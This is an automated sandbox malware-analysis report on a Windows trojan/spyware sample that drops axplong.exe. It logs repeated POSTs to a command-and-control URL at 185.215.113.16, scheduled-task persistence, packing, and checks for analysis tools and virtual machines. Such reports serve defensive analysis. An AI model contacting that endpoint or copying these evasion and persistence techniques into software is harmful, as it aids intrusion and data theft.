                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                  Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_0079BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,4_2_0079BD60
                  Source: global trafficDNS traffic detected: DNS query: time.windows.com
                  Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php32
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php8
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php:
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpD
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpX
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phph
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpp

                  System Summary

                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: .idata
                  Source: file.exeStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007D30684_2_007D3068
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_0079E4404_2_0079E440
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_00794CF04_2_00794CF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007C7D834_2_007C7D83
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007D765B4_2_007D765B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_00794AF04_2_00794AF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007D777B4_2_007D777B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007D87204_2_007D8720
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007D6F094_2_007D6F09
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007D2BD04_2_007D2BD0
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: file.exeStatic PE information: Section: ZLIB complexity 0.9971315139645777
                  Source: file.exeStatic PE information: Section: fhovjjjc ZLIB complexity 0.994316089837997
                  Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9971315139645777
                  Source: axplong.exe.0.drStatic PE information: Section: fhovjjjc ZLIB complexity 0.994316089837997
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@2/1
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\44111dbc49Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                  Source: file.exeStatic file information: File size 1942016 > 1048576
                  Source: file.exeStatic PE information: Raw size of fhovjjjc is bigger than: 0x100000 < 0x1a8600

                  Data Obfuscation

                  Source: C:\Users\user\Desktop\file.exe; Unpacked PE file: 0.2.file.exe.3c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fhovjjjc:EW;tlwinqqe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fhovjjjc:EW;tlwinqqe:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Unpacked PE file: 2.2.axplong.exe.790000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fhovjjjc:EW;tlwinqqe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fhovjjjc:EW;tlwinqqe:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Unpacked PE file: 4.2.axplong.exe.790000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fhovjjjc:EW;tlwinqqe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fhovjjjc:EW;tlwinqqe:EW;.taggant:EW;
                  Source: initial sample; Static PE information: section where entry point is pointing to: .taggant
                  Source: axplong.exe.0.dr; Static PE information: real checksum: 0x1e5e3c should be: 0x1de85d
                  Source: file.exe; Static PE information: real checksum: 0x1e5e3c should be: 0x1de85d
                  Source: file.exe; Static PE information: section name:
                  Source: file.exe; Static PE information: section name: .idata
                  Source: file.exe; Static PE information: section name:
                  Source: file.exe; Static PE information: section name: fhovjjjc
                  Source: file.exe; Static PE information: section name: tlwinqqe
                  Source: file.exe; Static PE information: section name: .taggant
                  Source: axplong.exe.0.dr; Static PE information: section name:
                  Source: axplong.exe.0.dr; Static PE information: section name: .idata
                  Source: axplong.exe.0.dr; Static PE information: section name:
                  Source: axplong.exe.0.dr; Static PE information: section name: fhovjjjc
                  Source: axplong.exe.0.dr; Static PE information: section name: tlwinqqe
                  Source: axplong.exe.0.dr; Static PE information: section name: .taggant
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Code function: 4_2_007AD84C push ecx; ret 4_2_007AD85F
                  Source: file.exe; Static PE information: section name: entropy: 7.976264378298446
                  Source: file.exe; Static PE information: section name: fhovjjjc entropy: 7.95414237718118
                  Source: axplong.exe.0.dr; Static PE information: section name: entropy: 7.976264378298446
                  Source: axplong.exe.0.dr; Static PE information: section name: fhovjjjc entropy: 7.95414237718118
                  Source: C:\Users\user\Desktop\file.exe; File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                  Boot Survival

                  Source: C:\Users\user\Desktop\file.exe; Window searched: window name: FilemonClass
                  Source: C:\Users\user\Desktop\file.exe; Window searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\Desktop\file.exe; Window searched: window name: RegmonClass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Window searched: window name: FilemonClass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Window searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Window searched: window name: RegmonClass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Window searched: window name: Regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Window searched: window name: Filemonclass
                  Source: C:\Users\user\Desktop\file.exe; File created: C:\Windows\Tasks\axplong.job
                  Source: C:\Users\user\Desktop\file.exe; Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\file.exe; File opened: HKEY_CURRENT_USER\Software\Wine
                  Source: C:\Users\user\Desktop\file.exe; File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; File opened: HKEY_CURRENT_USER\Software\Wine
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe; File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBA55 second address: 5EBA5A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
